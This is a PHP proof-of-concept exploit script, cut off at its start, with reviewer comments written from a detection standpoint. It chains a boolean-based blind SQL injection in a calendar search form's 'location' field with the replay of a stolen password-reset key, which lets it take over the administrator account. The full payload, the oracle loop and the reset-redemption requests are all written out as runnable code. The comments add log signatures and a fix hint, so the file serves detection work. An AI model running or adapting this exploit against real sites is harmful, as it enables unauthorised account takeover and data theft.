\n\n");
/* ---------------------------------------------------------------------------
 * Review annotations (defender / detection stance). The statement that ends on
 * the line above is cut off before this chunk -- only the tail of its string
 * argument survives -- so it is not reviewable here.
 *
 * What the rest of the script is: a two-stage account-takeover proof of
 * concept. Stage 1 is a boolean-based blind SQL injection through the
 * calendar search form's "location" field (sql_injection() below); stage 2
 * replays a password-reset key read out of the database with that injection.
 * Observable artefacts are noted inline so the activity can be recognised in
 * web-server / WAF logs and during incident response.
 * ------------------------------------------------------------------------ */
/* Base URL is taken verbatim from argv[1] with no validation; later requests
 * build "{$url}index.php?...", so a trailing slash is implicitly expected. */
$url = $argv[1];
/* One cURL handle is shared by every request and is mutated from inside
 * sql_injection() via `global`. */
$ch = curl_init();
/* Cookie jar in the current working directory; `@` hides the warning when the
 * file does not exist yet. The same path is reused on every run. */
@unlink("./cookies.txt");
curl_setopt($ch, CURLOPT_URL, "{$url}");
/* Response headers are prepended to the body returned by curl_exec(); the
 * final step depends on this to grep for the "301 Moved Permanently" line. */
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
/* TLS certificate and hostname verification are switched off for all requests. */
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
/* First request: an unauthenticated GET of the base URL, scraped with a regex
 * for the anti-CSRF token (`csrfKey: "..."`). The token is only needed because
 * the search endpoint checks it; it is not itself the weakness exploited.
 * Detection: the session created here immediately issues a burst of POSTs. */
if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
/* Fixed POST body for the calendar search form (app/module/controller/do).
 * The injectable field, "location", is added per request in sql_injection(). */
$params = ["app" => "calendar", "module" => "calendar", "controller" => "view", "do" => "search", "form_submitted" => 1, "csrfKey" => $csrf[1]];
/**
 * Reads the single value returned by $sql one byte at a time through a
 * boolean oracle.
 *
 * Oracle: the injected expression asks MySQL to evaluate `1 RLIKE '('`
 * (0x28, an invalid regular expression) when ORD(byte) < $test and
 * `1 RLIKE '1'` (0x31, valid) otherwise. A response containing
 * "elErrorMessage" -- presumably the application's error template, shown
 * when the regex fails -- is therefore read as "byte < $test".
 *
 * Each byte is located by an 8-step binary search over 0..255: $test starts
 * at 256 and is moved by 2^$i on every step, so every byte costs exactly eight
 * POSTs. Extraction stops at the first byte equal to 0, which is how the end
 * of the string is detected; if the very first byte is 0 the function returns
 * null, because $data is never assigned.
 *
 * Detection notes: every probe is a POST with do=search whose "location"
 * value starts with "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(" and ends with "#";
 * that literal shape is a high-confidence log/WAF signature, and the forced
 * regex error presumably also surfaces in the application or database error
 * log (confirm per deployment). The server-side fix is to bind "location" as
 * a query parameter instead of splicing it into SQL -- inferred from the
 * payload shape, since the vulnerable server code is not visible here.
 *
 * Code notes: relies on global mutable state ($ch, $params); $data is never
 * initialised, so the first `.=` acts on an undefined variable (PHP warns,
 * then treats it as ""); $min is a bool on entry and afterwards the 1/0/false
 * result of preg_match(); the progress line is printed with "\r" so it
 * overwrites itself on a terminal.
 *
 * @param string $sql  query expected to yield one scalar string
 * @return string|null the extracted value without the terminating 0 byte
 */
function sql_injection($sql) { global $ch, $params; $min = true; $idx = 1;
    /* One outer iteration per extracted byte; $idx is the 1-based SUBSTR offset. */
    while (1) { $test = 256;
        /* Binary search: the previous answer ($min) decides whether to step
         * $test down (byte was below it) or up (byte was not). */
        for ($i = 7; $i >= 0; $i--) { $test = $min ? $test - pow(2, $i) : $test + pow(2, $i);
            /* $sql is inlined as a subquery; the trailing "#" comments out the
             * remainder of the server's original statement. */
            $params["location"] = "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},0x28,0x31)))#";
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
            /* Oracle read: error marker present <=> byte < $test. */
            $min = preg_match("/elErrorMessage/", curl_exec($ch)); }
        /* After the last 1-step probe, $test is either the byte itself or one
         * above it; a resulting 0 byte terminates the string. */
        if (($chr = $min ? $test - 1 : $test) == 0) break;
        $data .= chr($chr); $min = true; $idx++; print "\r[*] Data: {$data}"; }
    return $data; }
/* Stage 1: read the e-mail address stored for member_id=1 (by the naming this
 * is taken to be the first/administrative account -- not verifiable here). */
print "[+] Step 1: fetching admin's e-mail address\n";
$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");
/* Stage 2 is interactive: the operator requests the password reset out of band
 * (from a browser, not this script), so in logs the reset request may arrive
 * from a different client than the probe burst. fgets() blocks until Enter. */
print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. 
When you're done press enter."; fgets(STDIN);
/* Stage 3: the pending reset key is itself stored in the database
 * (core_validating, newest row with lost_pass=1) and is read through the same
 * oracle -- the reset flow's secret is only as safe as the database contents. */
print "[+] Step 3: fetching the password reset key\n";
$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");
print "\n[+] Step 4: taking over the admin account by resetting their password\n";
/* Stage 4: redeem the key against the lost-password endpoint, reusing the
 * cookie jar and the csrfKey scraped by the first GET. */
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");
/* The new password is md5() of the current Unix timestamp -- 32 hex chars with
 * roughly one second of entropy. IR note: if a run is dated from server logs,
 * the password this script set is recoverable from that timestamp. */
$passwd = md5(time());
/* $params is rebound from the earlier array to a pre-encoded query string. */
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
/* Success is inferred from a 301 in the raw headers (CURLOPT_HEADER above);
 * any other status, including a rendered error page, aborts. */
if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");
print "[+] Pwned! You can now login with {$email}:{$passwd}\n";